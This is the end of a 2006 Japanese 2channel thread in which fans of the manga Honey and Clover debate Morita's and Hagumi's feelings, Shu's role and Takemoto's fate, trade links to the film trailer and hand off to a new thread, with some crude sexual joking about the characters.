898 :花と名無しさん:2006/07/17(月) 23:04:09 ID:???0
>>895
あれはコクろうと思ってるシーンだから鯉に見える
でも森田が一番自分のことをわかってないから…

899 :花と名無しさん:2006/07/17(月) 23:05:18 ID:???0
アニメ板の画材屋デートの森田は何か違った!
漫画だと口笛ふきながら歩いてるのにアニメは何か怖かった。
お茶していこうYOって雰囲気じゃなかったぞ。

900 :花と名無しさん:2006/07/17(月) 23:05:37 ID:???0
900

901 :花と名無しさん:2006/07/17(月) 23:06:09 ID:???0
修が、森田が復讐作戦決行する前にはぐのこと覗き見してたとき
「おまえにならパグが今何に悩んでるかわかるはず」とか言ってたじゃん。
なんか解ったようなこと言ってるけど、
はぐみの悩みは修に人生貰っちゃおうかどうか、でしょ?
森田にわかるわけないと思うんだけど、あれは修のかんちがいっぷりが描きたかったの?

902 :花と名無しさん:2006/07/17(月) 23:07:37 ID:???O
森田の様子を描きたかったんじゃないの

何かが崩れていってるかんじ

903 :花と名無しさん:2006/07/17(月) 23:07:37 ID:???0
>>899
思った。
あれははぐじゃなくてもおびえるわ

904 :花と名無しさん:2006/07/17(月) 23:07:59 ID:???0
>>901
自分はそう解釈してる

905 :花と名無しさん:2006/07/17(月) 23:08:37 ID:???0
ていうか恋の定義のハナシになるけど
森田のは恋というより小動物に対する一方的な愛情なんだよ
人格を持ったはぐみに対してじゃなくさ
今まではね。
今後、学習して変わって逆転王子様に返り咲いたらたいしたもんですが。

906 :花と名無しさん:2006/07/17(月) 23:11:05 ID:???O
ちょww今初めて映画の予告見たがたけのこの「はぐちゃん、俺は」の言い方ワロスww吹いた

907 :花と名無しさん:2006/07/17(月) 23:12:10 ID:???0
>>905 なるほど。

今までは復讐やらなにやらで
「人格を持ったはぐみ」に向き合うことができていなかった・・・

と考えると、その展開も結構いい線いってるかも。

908 :花と名無しさん:2006/07/17(月) 23:12:25 ID:???0
だから兄がいない寂しさを埋めるためにアジトにはぐみ連れてきて
抱き枕の代わりにしちゃうんだよ。
子供っぽいスキンシップ願望なんだよ

909 :花と名無しさん:2006/07/17(月) 23:13:43 ID:???0
>>906
完全にデブキャラっぽいよね

910 :花と名無しさん:2006/07/17(月) 23:15:26 ID:???0
>>906>>909 

   orz          たけもこ…

911 :花と名無しさん:2006/07/17(月) 23:18:53 ID:???0
森田は本物の恋だと思うけど、はぐは小学生の恋愛ごっこっぽいなあ
胸キュンしただけでこれが恋?恋なのね?みたいな


912 :花と名無しさん:2006/07/17(月) 23:19:00 ID:oYmh02UT0
>>906
あれって辛抱堪らんって感じでタケノコが何かしでかしそうな言い方w

913 :花と名無しさん:2006/07/17(月) 23:19:14 ID:???0
はぐみのは恋愛のパートナーというよりも芸術をやっていく上でのパートナーを欲していた。
それは今の時点では修にしかできない。
というのは理解。
でも修の恋愛感情は本当に要らなかった、何あれ。
>>905
デートとかプレゼントとかキスとか形式だけの部分はやってもまともな会話は殆ど無かったね。
そもそもまともに名前すら呼んでいないような。
ああいうのが森田の恋愛を可愛い動物を可愛がる延長線上に見せている気がしたよ。
人間の最優先は兄貴じゃないかと。

914 :花と名無しさん:2006/07/17(月) 23:19:42 ID:???0
自分は復讐しなきゃいけないダークサイドの人間だからってことで、
自制してはぐと距離とってたんだし、
そこまで原始的な感情でもない気がする。
でも、復讐劇とか馨失踪とかで気が弱ってたのとはぐのケガが重なったことで
これ以上失いたくないみたいな気分にまかせて一方的な押し付けしちゃった。
と、思っていたけど、>>908読んでそっちかもと思ってしまった。

915 :花と名無しさん:2006/07/17(月) 23:20:19 ID:oYmh02UT0
>>908
そういう一面もあるけど
一応プロポーズ級の告白してんだぜ。
あそこまできて森田にキモチがないとか言うなよ。

916 :花と名無しさん:2006/07/17(月) 23:22:36 ID:oYmh02UT0
>>914
いや、あなたの解釈でOKでしょ。
はぐの力になってやれっていう再三にわたる修の助言を無視したのも
復讐プロジェクト進行中だからこそ。
最後のカーテン越しの森田は最後の戦いの前に会いたかったんだよ。


917 :花と名無しさん:2006/07/17(月) 23:23:04 ID:???0
>>915
森田の中では最上級の愛情だけど、
その最上級すら子供っぽいってことじゃない?

なんか王子様が心配になってきた・・・

918 :花と名無しさん:2006/07/17(月) 23:23:55 ID:???0
現実の男でも、女を小動物として可愛がって妻にしてるのはいっぱいいます。
そういうのを恋と呼べると思えば思ってもいい。
でも多少の人格があると自負してる女の方は、
それはあんまり嬉しくない男の我侭に感じるよね。
男なんて子供っぽいという言葉がまかり通るのもこういう理屈

919 :花と名無しさん:2006/07/17(月) 23:25:22 ID:???0
森田は芸術の才能を復讐の道具として使った時点で
純粋に芸術が好きなはぐみとは道が分かれたっていうのかな?

ところでこの漫画のキャラってなんか付き合いが長い人間ばかりに依存していない?
新しい出会いがあったのは野宮→山田ですか
たけのっこに新しい出会いはありませんか、そうですか

920 :花と名無しさん:2006/07/17(月) 23:26:39 ID:???0
弱ってるときの「そばにいてくれ」に
プロポーズ級の威力はない

921 :花と名無しさん:2006/07/17(月) 23:27:31 ID:???0
映画の予告の竹本・・・。・゜・(ノД`)・゜・。

922 :花と名無しさん:2006/07/17(月) 23:28:12 ID:???0
臭もはぐへの愛は小動物やペットを可愛がるみたいだよ。
可愛がりすぎてスポイルしちゃうみたいな。

923 :花と名無しさん:2006/07/17(月) 23:29:03 ID:???0
>>919
なるほど、そうかも!
なんか森田カワイソウになってきた。
幸せにしてやってくれ・・・

924 :花と名無しさん:2006/07/17(月) 23:30:25 ID:???0
>>920
納得

925 :花と名無しさん:2006/07/17(月) 23:30:26 ID:???0
>>922
でも彼女の気持ちや人格はちゃんと尊重してるよ

926 :花と名無しさん:2006/07/17(月) 23:30:50 ID:???0
森田とはぐの間に「恋愛」感情はあった。
しかし
それぞれが「自分」を決定付けるものを選択しなきゃならない究極の精神状態に追い込まれたとき、
お互い「恋愛」は選べなかった(選ぶ余裕がなかった)・・・ て感じか?

927 :花と名無しさん:2006/07/17(月) 23:34:08 ID:oYmh02UT0
>>917
復讐後は不器用だが自分を晒してるじゃん。


928 :花と名無しさん:2006/07/17(月) 23:34:22 ID:???0
映画の予告編って何処で見れますか?

929 :花と名無しさん:2006/07/17(月) 23:34:25 ID:???0
カオルと修がいなかったら、
この二人は晴れて結ばれることができたのかな?

930 :花と名無しさん:2006/07/17(月) 23:34:57 ID:???0
ようつべ

931 :花と名無しさん:2006/07/17(月) 23:35:11 ID:???0
>>929
そいつら居なかったら出会わなかったかもしれないよ

932 :花と名無しさん:2006/07/17(月) 23:36:21 ID:???0
>>931
あぶねぇ・・・全く同じカキコするとこだったw

933 :花と名無しさん:2006/07/17(月) 23:36:32 ID:???0
ぶっちゃけ修がいても馨がいなきゃいけたよ。

934 :花と名無しさん:2006/07/17(月) 23:36:37 ID:???0
ttp://www.youtube.com/watch?v=4eDNvlO5VKE
どうぞ

935 :花と名無しさん:2006/07/17(月) 23:36:38 ID:???0
カオルが復讐にとらわれてなくて
シュウが原田-理花コンプレックスにとらわれてなかったら

936 :花と名無しさん:2006/07/17(月) 23:37:25 ID:???0
たけのこがもはや本当に場外だな

937 :花と名無しさん:2006/07/17(月) 23:37:37 ID:???0
>>933 同感w

938 :花と名無しさん:2006/07/17(月) 23:37:58 ID:???0
>>934間違ったごめん
ハチミツで検索すれば出てくるよ>>928

939 :花と名無しさん:2006/07/17(月) 23:38:21 ID:???0
ええいもう馨とくっついてしまえ。
そうするとたけのこは独りか

940 :花と名無しさん:2006/07/17(月) 23:39:04 ID:???0
カオルが復讐しなかった場合忍の性格も変わってたりしてw

941 :花と名無しさん:2006/07/17(月) 23:39:32 ID:???0
>>938
わざとじゃなかったのかよwww

942 :花と名無しさん:2006/07/17(月) 23:39:50 ID:???0
いくらなんでもここまで付き合ってくれた弟に
「天才のおまえにゃわかんねーよ」とか言って失踪って!おいおい
しかもものすごくタイミングが悪い。

つくづく酷い兄だな・・・・・・・・・

943 :花と名無しさん:2006/07/17(月) 23:40:25 ID:???0
シノブとはぐみがくっつき
修と理花がくっつき
真山と山田がくっつき
野宮は誰かとくっつき
オサレと美和子さんがくっつき
カオルとたけのこがくっつく

944 :花と名無しさん:2006/07/17(月) 23:40:30 ID:???O
森田ははぐに恋してるって気付いてなかったと思う

鮎とは違うんだけど…なんだろ?このかんじ
みたいな

んでたけのこの行動とか色々あって、やっと気付いたみたいな

自分の好きな女性に対してどうやって接したらいいのかわからなかったから、子供の頃飼ってたぬこのようにしちゃったと

945 :花と名無しさん:2006/07/17(月) 23:41:30 ID:???0
>>940
馨がいなければ森田は光をめざして一直線だったので
森田父のようになれたはずなんじゃない?

946 :花と名無しさん:2006/07/17(月) 23:42:05 ID:???0
>>934
だっぽんって??
映画のCM見れました
竹本の声に少し涙が出てきそうになりました

947 :花と名無しさん:2006/07/17(月) 23:43:40 ID:???0
ここで森田の年齢を思い出してみようか。

2 7 歳

27にもなって森田はこの愛情表現法・・・

948 :花と名無しさん:2006/07/17(月) 23:44:10 ID:???0
>>945
今思うとギャグパートの森田って実は父親を意識していたのかな?
いや多分あれが地なんだとは思うけどシリアスパートと極端に差がありすぎてさー

949 :花と名無しさん:2006/07/17(月) 23:44:47 ID:???0
カオルにいちゃんの悪口を言うな!

950 :花と名無しさん:2006/07/17(月) 23:46:25 ID:???0
↓これはカナシスなのでやだな・・・

750 :花と名無しさん :2006/07/17(月) 21:02:46 ID:???0
森田が今までぶっとんだギャグキャラだったのは
復讐という闇を背負ってるために他人とあまり深く関わることをためらう彼は
道化を演じることで自分の心に踏み込まれないよう他人と距離をとってきた・・
って理由だったのか?とか思い始めたらもう
8巻までの森田がイタイタしくてみてられんw

951 :花と名無しさん:2006/07/17(月) 23:46:36 ID:???0
最終回。
リカ→原田がやり残した仕事を終えて安心してあぼん。
真山→リカを救えなかったことをくやみあぼん。
山田→真山が(ry
はぐ→修の重荷になるのと右手再起不能になりショックであぼん
修→(ry

竹本一人生き残り一人語りでEND
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \


952 :花と名無しさん:2006/07/17(月) 23:47:16 ID:???0
ギャグパートの森田弟は
森田父を凌駕してかなり眩しいぞ>>948
その反動でシリアスパートが重いのだろう
平均すれば父くらいなんだ

953 :花と名無しさん:2006/07/17(月) 23:47:25 ID:???0
↓9巻の状況
ttp://www.youtube.com/watch?v=iwatGWgbUFw

954 :花と名無しさん:2006/07/17(月) 23:47:33 ID:???0
森田もちゃんと殺してやれよ

955 :花と名無しさん:2006/07/17(月) 23:48:44 ID:???O
森田好きだ。竹の子も最近(気の毒すぎて)情がわいてきた。
だからこそ、守られるだけ・依存だけ・靴やベルサイユや治療費を貢がせるだけ、自分から相手に何かを与えることをしないカバミなんぞとはくっついてほしくない。
過去やコンプレックスに捉われてくすぶってる臭とちょうどお似合い。

956 :花と名無しさん:2006/07/17(月) 23:49:38 ID:???0
森田さんお金を集めてるのに事情があるんだろうなー
位の気持ちで見てたから、なんかとってつけたようなシリアスには
はいはい、って感じだった

957 :花と名無しさん:2006/07/17(月) 23:50:34 ID:???0
>>953
工エエェェ(´д`)ェェエエ工
30秒で我慢できなくなったよー

958 :花と名無しさん:2006/07/17(月) 23:52:58 ID:???0
もしかしてあと1〜2巻くらいで終わるのかな?
いきなりの激欝シリアス展開でビビったよ9巻
森田兄弟の事情はもう少し引っ張ると思ったのに一気に暴露されても・・・

959 :花と名無しさん:2006/07/17(月) 23:53:25 ID:???0
パグはてっきり
森田を暗い過去から救いだしてあげる役かなー
とおもってたらケガで自分いっぱいいっぱいになっちゃってた。
こいつって本当に・・・

960 :花と名無しさん:2006/07/17(月) 23:54:58 ID:???0
これは…(つ;Д`)
ttp://www.youtube.com/watch?v=9fOzowW9nF8

この頃の竹本は輝いていたなぁ…。

961 :花と名無しさん:2006/07/17(月) 23:55:09 ID:???0
はぐは自分さえよければそれでいい女ですよ。

962 :花と名無しさん:2006/07/17(月) 23:55:38 ID:???0
次の巻で終わり。

森田が実物大ベルサイユを作ってやると予想!

963 :花と名無しさん:2006/07/17(月) 23:55:47 ID:???0
>950
ガチで750の書いてるとおりだと思う。

森田も竹の子もひたすらかわいそう。
今までも十分不幸なのに。

修も作者の暴走のせいでロリコンパパにされて哀れといえば哀れ。

964 :花と名無しさん:2006/07/17(月) 23:56:02 ID:???0
でも森田兄弟は10代前半に大人の女性に筆おろししてもらってると思うのね。
だから童貞でもないのにこの愛情表現…というのはもう
恋だと気づいてないとかそういう以前に、性分だと思うのよ。
子供っぽいのよ。そこが魅力でもあるんだけどね。

965 :花と名無しさん:2006/07/17(月) 23:58:28 ID:oYmh02UT0
>>950
回想シーンのシノブはわんぱくだけどいい子だもんな。
やっぱ復讐で闇とバランスとってたんだよ。
たまに山田に対してとか修に対してマジモードがあるけど
あれが本来の姿なんだろうね。


966 :花と名無しさん:2006/07/17(月) 23:58:56 ID:???0
自分も750合ってる気がするよ。
かなしい話だぜ。
やっと道化の殻を脱げたとおもったら
ロリコンオヂサンに好きな子とられちゃうとはね。

967 :花と名無しさん:2006/07/17(月) 23:59:27 ID:???0
>>953
ムサシをつかまえる巨大ロボットみたいなのが
ハグみたいな髪型してたね。

968 :花と名無しさん:2006/07/17(月) 23:59:48 ID:???0
>>964
前提がものすごくブットンデルヨ?

969 :花と名無しさん:2006/07/18(火) 00:00:20 ID:???0
童貞は臭と山田とたけのこだけ
はぐも実は経験済み

970 :花と名無しさん:2006/07/18(火) 00:00:27 ID:???0
そろそろだと思うんで

次スレ立ててきます

971 :花と名無しさん:2006/07/18(火) 00:00:27 ID:???0
新スレおながいします。

972 :花と名無しさん:2006/07/18(火) 00:00:58 ID:???0
たけのこ自分探しの旅で逞しくなって帰ってきてこれで森田とも張り合えるぞーって所で
急に展開が・・・しかも結局はぐみは修が居ればいいんかいっ!!?
森田は馨に散々言われてアレだし何でこんなに暗いんだろー
はぐみが怪我する経緯もちょっといきなりすぎて唖然・・・

973 :花と名無しさん:2006/07/18(火) 00:01:43 ID:???0
>>964は少年時代の森田兄弟とやりたいショタコンオバサン。
臭なみにキモイです。

974 :花と名無しさん:2006/07/18(火) 00:01:54 ID:???0
>>969
修はねえよ、修は!

975 :花と名無しさん:2006/07/18(火) 00:02:38 ID:???0
森田童子

976 :花と名無しさん:2006/07/18(火) 00:02:39 ID:???0
臭はチンチンは童貞ですが
ケツはガバガバですよ?

977 :970:2006/07/18(火) 00:03:02 ID:???0

すいませんホスト規制で立てられませんですた

誰か他の方おながいします。 

978 :花と名無しさん:2006/07/18(火) 00:03:06 ID:???0
ムサシ=忍
ロウニン=たけもと
ラセツロボ=はぐりん

979 :花と名無しさん:2006/07/18(火) 00:03:10 ID:???0
上でもかなりもめてたが、
タケノコは自分探しから帰ってから急に性格が悪くなったよなぁ

980 :花と名無しさん:2006/07/18(火) 00:03:42 ID:???0
ketuガバガバは藤原デザイン系があやしい

981 :花と名無しさん:2006/07/18(火) 00:04:19 ID:???0
>>978
いいたとえだな 少し借りるぞ

982 :花と名無しさん:2006/07/18(火) 00:05:02 ID:???0
まーでも確かに修は、原田原田言ってたし
リカと同棲してたときも手を出してなかったとなると・・・

983 :花と名無しさん:2006/07/18(火) 00:05:09 ID:???0
なんか登場人物の男子がみんなとても華奢になったな

984 :花と名無しさん:2006/07/18(火) 00:06:17 ID:???0
>>982
アッー!
そうだねリカと二人で原田の…

985 :花と名無しさん:2006/07/18(火) 00:06:26 ID:???0
それも堺効果でしょう

986 :花と名無しさん:2006/07/18(火) 00:09:44 ID:???0
新スレ誰か!

たけのこってほんとに自分探しの意味無かったな。
職探しかあれは?

987 :花と名無しさん:2006/07/18(火) 00:09:55 ID:???0
どんな効果だろう・・・

988 :花と名無しさん:2006/07/18(火) 00:11:11 ID:???0
27〜で童貞は嫌だろう

989 :花と名無しさん:2006/07/18(火) 00:11:46 ID:yNFPtApz0
>>982
出してるに決まってんだろ。どう解釈したらやってないんだよ。
慰めあったがそれも互いに傷つけあうから別れたんだよ。
ちゃんと行間読め馬鹿!

990 :花と名無しさん:2006/07/18(火) 00:11:48 ID:???0
てか20〜で既にかなりいや。

991 :花と名無しさん:2006/07/18(火) 00:13:23 ID:???0
「そんな色っぽい話ジャナイヨー」って修が言ってたから・・
てっきり信じちゃったよ。
あれは真山に刺されないための防御か。

992 :花と名無しさん:2006/07/18(火) 00:13:58 ID:???0
だからまがりなりにも亡命中の王子には
早いとこ喪失しておいてもらったほうが気持ちいいよね

993 :花と名無しさん:2006/07/18(火) 00:13:59 ID:???0
もうわからんちんなこの展開に悲しくなってきた

994 :花と名無しさん:2006/07/18(火) 00:14:52 ID:???0



   書 き 込 み 一 旦 ス ト ッ プ

995 :花と名無しさん:2006/07/18(火) 00:16:08 ID:???0
>>982
そんな慰めあう関係にならざる得なかったのも
なんだか原田生前にいろいろあったからかと思えるよ。
臭のケツに・・・・

996 :花と名無しさん:2006/07/18(火) 00:16:53 ID:yNFPtApz0
>>991
あそこで「ああやったさ、キモチ良かったさ!童貞喪失筆下ろしさ!」
っていうわけねえべw

997 :花と名無しさん:2006/07/18(火) 00:17:01 ID:???0
立ててきますよ?

998 :花と名無しさん:2006/07/18(火) 00:18:39 ID:???0
臭は無自覚なまま、はぐを幼女の頃から、いや
乳児の頃から好きだったから
リカにはハァハァしなかったんだよ

ロ・リ・イ・タ 臭はアブナイおにいさん♪

999 :花と名無しさん:2006/07/18(火) 00:20:50 ID:???0
>>997
乙カレー☆

1000 :花と名無しさん:2006/07/18(火) 00:20:52 ID:???0
新スレ
http://comic6.2ch.net/test/read.cgi/gcomic/1153149606/

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

216 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)